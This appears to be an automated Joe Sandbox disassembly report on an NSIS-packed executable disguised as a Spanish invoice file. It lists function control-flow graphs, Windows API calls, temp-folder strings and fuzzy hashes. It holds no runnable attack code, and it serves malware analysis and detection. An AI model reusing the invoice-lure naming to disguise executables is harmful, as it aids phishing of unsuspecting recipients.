                                  • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                • lstrcatW.KERNEL32(1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405A9C
                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                • GetFileAttributesW.KERNEL32(Call), ref: 00405B40
                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\fanin), ref: 00405B89
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\fanin$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-790534633
                                • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D
                                Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441stringtimesleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 382 40154a-4015bd 383 402ea1 382->383 384 4015c3-4015c7 382->384 385 402ea5 383->385 386 4016c1-4016cf 384->386 387 4017c2-401e9e call 40303e call 4065aa 384->387 388 401684-4016aa 384->388 389 4015e6-4015ee 384->389 390 4018cb-4018d4 call 40303e call 406a31 384->390 391 40160c-40160d 384->391 392 4015ce-4015d0 384->392 393 4016ef-4016fb call 40303e SetFileAttributesW 384->393 394 4016af-4016bc call 4065fa 384->394 395 40182f-40184b call 40303e GetFullPathNameW 384->395 396 401711-401728 call 40303e call 406ba0 384->396 397 401633-40163a SetForegroundWindow 384->397 398 4017d3-4017f6 call 40303e * 3 MoveFileW 384->398 399 4015d5-4015d6 384->399 400 401618-40162e call 403002 Sleep 384->400 401 4015f9-401607 call 4030fd call 401399 384->401 402 40189b-4018b8 call 40303e SearchPathW 384->402 403 4018de-401904 call 40303e call 406dde 384->403 404 40163f-401645 384->404 411 402eab 385->411 422 4016d1-4016d5 ShowWindow 386->422 423 4016d9-4016e0 386->423 474 401bb2-401bb6 387->474 475 401ea4-401ea8 387->475 420 402ead-402eb7 388->420 405 4015f0-4015f7 PostQuitMessage 389->405 406 4015dc-4015e1 389->406 459 4018d9 390->459 414 40160e-401613 call 405d15 391->414 392->420 442 401701-401703 393->442 394->383 452 401857-40185d 395->452 453 40184d-401855 395->453 467 401784-40178e 396->467 468 40172a-40173f call 4065d1 396->468 397->383 483 401804-401808 398->483 484 4017f8-4017ff 398->484 424 4015d7 call 405d15 399->424 400->383 401->420 402->383 446 4018be-4018c6 402->446 470 401906-40190c call 406af5 403->470 471 40190e-401920 call 406af5 call 406531 lstrcatW 403->471 417 401671-40167f 404->417 418 401647 404->418 405->406 406->420 411->420 414->383 417->383 436 401657-40166c call 403002 418->436 437 401649-401650 418->437 422->423 423->383 440 4016e6-4016ea ShowWindow 423->440 424->406 436->383 437->436 440->383 442->383 454 401709-40170c 442->454 446->385 463 40187b 452->463 464 40185f-401862 452->464 462 40187f-401883 453->462 454->385 459->442 462->385 465 401889-401896 GetShortPathNameW 462->465 463->462 464->463 472 401864-40186c call 4065aa 464->472 465->385 479 401790-4017ab call 405d15 call 406af5 SetCurrentDirectoryW 467->479 480 4017bb-4017bd 467->480 489 401741-401745 468->489 490 401758-401759 call 405df9 468->490 492 401925-40192d call 406d18 470->492 471->492 472->453 495 40186e-401876 call 406af5 472->495 474->420 475->420 479->383 513 4017b1-4017b6 479->513 480->414 483->454 491 40180e-401816 call 4065aa 483->491 484->414 489->490 496 401747-40174e call 4064d7 489->496 505 40175e-401760 490->505 491->454 509 40181c-40182a call 406218 491->509 512 40192e-401931 492->512 495->463 496->490 514 401750-401751 call 405e19 496->514 510 401762-401767 505->510 511 401775-40177e 505->511 509->414 516 401774 510->516 517 401769-401772 GetFileAttributesW 510->517 511->468 518 401780 511->518 519 401933-40193d call 4065aa 512->519 520 401964-401966 512->520 513->383 528 401756 514->528 516->511 517->511 517->516 518->467 530 401950-401960 519->530 531 40193f-40194e CompareFileTime 519->531 521 401968-401969 call 406b78 520->521 522 40196e-401989 call 4068f6 520->522 521->522 533 401a18-401a49 call 405d15 call 403148 522->533 534 40198f-401991 522->534 528->505 530->520 531->530 547 401a52-401a5a SetFileTime 533->547 548 401a4b-401a50 533->548 535 401993-4019df call 406af5 * 2 call 405e95 call 406af5 call 406a83 534->535 536 4019fd-401a13 call 405d15 534->536 535->512 565 4019e5-4019e8 535->565 536->385 549 401a60-401a6d CloseHandle 547->549 548->547 548->549 549->383 551 401a73-401a76 549->551 553 401a78-401a87 call 405e95 lstrcatW 551->553 554 401a89-401a8c call 405e95 551->554 560 401a91-401a9c call 406a83 553->560 554->560 560->406 560->474 566 4019f2-4019f8 565->566 567 4019ea-4019ed 565->567 566->411 567->424
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                • SetForegroundWindow.USER32 ref: 00401634
                                • ShowWindow.USER32(00010438,00000000,?,?,00000000,00000000), ref: 004016D3
                                • ShowWindow.USER32(00010432,?,?,?,00000000,00000000), ref: 004016E8
                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 004017A3
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll$Call
                                • API String ID: 3895412863-3907732295
                                • Opcode ID: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                • Opcode Fuzzy Hash: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E
                                Function 004033C8 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 568 4033c8-403415 GetTickCount GetModuleFileNameW call 4068f6 571 403421-403451 call 406af5 call 406ceb call 406af5 GetFileSize 568->571 572 403417-40341c 568->572 580 403457 571->580 581 40354d-40355c call 403364 571->581 573 403620-403627 572->573 583 40345b-403481 call 40311b 580->583 586 403562-403564 581->586 587 40361b 581->587 591 403613-40361a call 403364 583->591 592 403487-40348e 583->592 589 403595-4035c5 GlobalAlloc call 403131 call 403148 586->589 590 403566-40357e call 403131 call 406923 586->590 587->573 589->587 617 4035c7-4035d9 589->617 613 403583-403585 590->613 591->587 596 403490-4034a9 call 40668f 592->596 597 40350f-403512 592->597 600 40351c-403522 596->600 611 4034ab-4034b3 596->611 599 403514-40351b call 403364 597->599 597->600 599->600 608 403524-403533 call 406e17 600->608 609 403537-40353f 600->609 608->609 609->583 612 403545-403549 609->612 611->600 618 4034b5-4034bd 611->618 612->581 613->587 619 40358b-40358f 613->619 620 4035e1-4035e4 617->620 621 4035db 617->621 618->600 622 4034bf-4034c7 618->622 619->587 619->589 624 4035e7-4035ef 620->624 621->620 622->600 623 4034c9-4034d1 622->623 623->600 625 4034d3-4034f2 623->625 624->624 626 4035f1-40360a SetFilePointer call 40668f 624->626 625->587 627 4034f8-4034fe 625->627 630 40360f-403611 626->630 627->612 629 403500-403509 627->629 629->600 631 40350b-40350d 629->631 630->573 631->600
                                APIs
                                • GetTickCount.KERNEL32 ref: 004033DB
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                                • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                • API String ID: 2803837635-970504228
                                • Opcode ID: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                • Opcode Fuzzy Hash: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E
                                Function 00405E95 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 632 405e95-405e9e 633 405ea0-405eaf 632->633 634 405eb1-405ecc 632->634 633->634 635 405ee3-405eea 634->635 636 405ece-405ed9 634->636 638 405ef0-405ef3 635->638 639 4060de-4060e5 635->639 636->635 637 405edb-405edf 636->637 637->635 640 405ef4-405f02 638->640 641 4060f0 639->641 642 4060e7-4060ee call 406af5 639->642 643 405f08-405f13 640->643 644 4060d9-4060dd 640->644 646 4060f2-4060f8 641->646 642->646 647 4060b2 643->647 648 405f19-405f5d 643->648 644->639 652 4060c0 647->652 653 4060b4-4060be 647->653 650 405f63-405f74 648->650 651 40605d-406060 648->651 654 405fb4-405fb7 650->654 655 405f76-405f94 call 406952 650->655 656 406062-406065 651->656 657 406096-406099 651->657 658 4060c3 652->658 653->658 662 405fc7-405fca 654->662 663 405fb9-405fc5 GetSystemDirectoryW 654->663 668 405f99-405fa2 655->668 664 406075-40608c call 406af5 656->664 665 406067-406073 call 4065fa 656->665 660 4060a4-4060b0 lstrlenW 657->660 661 40609b-40609f call 405e95 657->661 666 4060c5-4060d3 658->666 660->666 661->660 671 405fda-405fe2 662->671 672 405fcc-405fd8 GetWindowsDirectoryW 662->672 670 406035 663->670 664->660 682 40608e-406094 call 406d18 664->682 665->660 666->640 666->644 676 406039-40603e 668->676 677 405fa8-405faf call 405e95 668->677 670->676 678 405fe4-405fed 671->678 679 405ff9-40600f SHGetSpecialFolderLocation 671->679 672->670 683 406040-406043 676->683 684 406051-40605b call 406d18 676->684 677->676 686 405ff5-405ff7 678->686 680 406011-40602a SHGetPathFromIDListW CoTaskMemFree 679->680 681 40602c-406033 679->681 680->670 680->681 681->670 681->671 682->660 683->684 688 406045-40604b lstrcatW 683->688 684->660 686->670 686->679 688->684
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FBF
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 00405FD2
                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 004060A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                • String ID: >5^$Call$Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4187626192-2469495729
                                • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE
                                Function 00405D15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76stringwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 983 405d15-405d21 984 405df2-405df6 983->984 985 405d27-405d3a 983->985 986 405d46-405d56 lstrlenW 985->986 987 405d3c-405d41 call 405e95 985->987 989 405d58-405d67 lstrlenW 986->989 990 405d7b 986->990 987->986 991 405d6d-405d79 lstrcatW 989->991 992 405def-405df1 989->992 993 405d80-405d83 990->993 991->993 992->984 994 405d92-405d95 993->994 995 405d85-405d8c SetWindowTextW 993->995 996 405d97-405ddb SendMessageW * 3 994->996 997 405ddd-405ddf 994->997 995->994 996->997 997->992 998 405de1-405de7 997->998 998->992
                                APIs
                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 00405D8C
                                • SendMessageW.USER32(00010432), ref: 00405DB3
                                • SendMessageW.USER32(00010432,0000104D,00000000,?), ref: 00405DCE
                                • SendMessageW.USER32(00010432,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 1759915248-1990854623
                                • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD
                                Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 999 40291d-402934 call 403002 1002 402ea1-402ea5 999->1002 1003 40293a-40294b 999->1003 1007 402eab-402eb7 1002->1007 1005 402951-402965 call 406c00 1003->1005 1006 402aa2-402aac 1003->1006 1005->1006 1014 40296b-402973 1005->1014 1010 402ab5-402aba 1006->1010 1012 402ad3-402ae2 SetFilePointer 1010->1012 1013 402abc-402ac1 1010->1013 1012->1006 1015 402ac3-402ac6 1013->1015 1016 402ac8-402ad1 1013->1016 1017 402975-40297a 1014->1017 1015->1012 1015->1016 1016->1006 1018 402980-40299c ReadFile 1017->1018 1019 402a33-402a37 1017->1019 1018->1006 1022 4029a2-4029ac 1018->1022 1020 402a39-402a3b 1019->1020 1021 402a4c-402a5b call 406923 1019->1021 1020->1021 1023 402a3d-402a46 call 40645f 1020->1023 1021->1006 1030 402a5d-402a61 1021->1030 1022->1006 1025 4029b2-4029bf 1022->1025 1023->1006 1035 402a48 1023->1035 1026 402ae4-402aee call 4065fa 1025->1026 1027 4029c5-4029dc MultiByteToWideChar 1025->1027 1026->1002 1026->1007 1027->1030 1031 4029de-4029e4 1027->1031 1037 402a65-402a69 1030->1037 1034 4029e6-4029f4 1031->1034 1034->1037 1039 4029f6-402a2f SetFilePointer MultiByteToWideChar 1034->1039 1035->1021 1037->1026 1038 402a6b-402a76 1037->1038 1038->1010 1040 402a78-402a7d 1038->1040 1039->1034 1041 402a31 1039->1041 1040->1010 1042 402a7f-402a92 1040->1042 1041->1030 1042->1006 1043 402a94-402a9c 1042->1043 1043->1006 1043->1017
                                APIs
                                • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
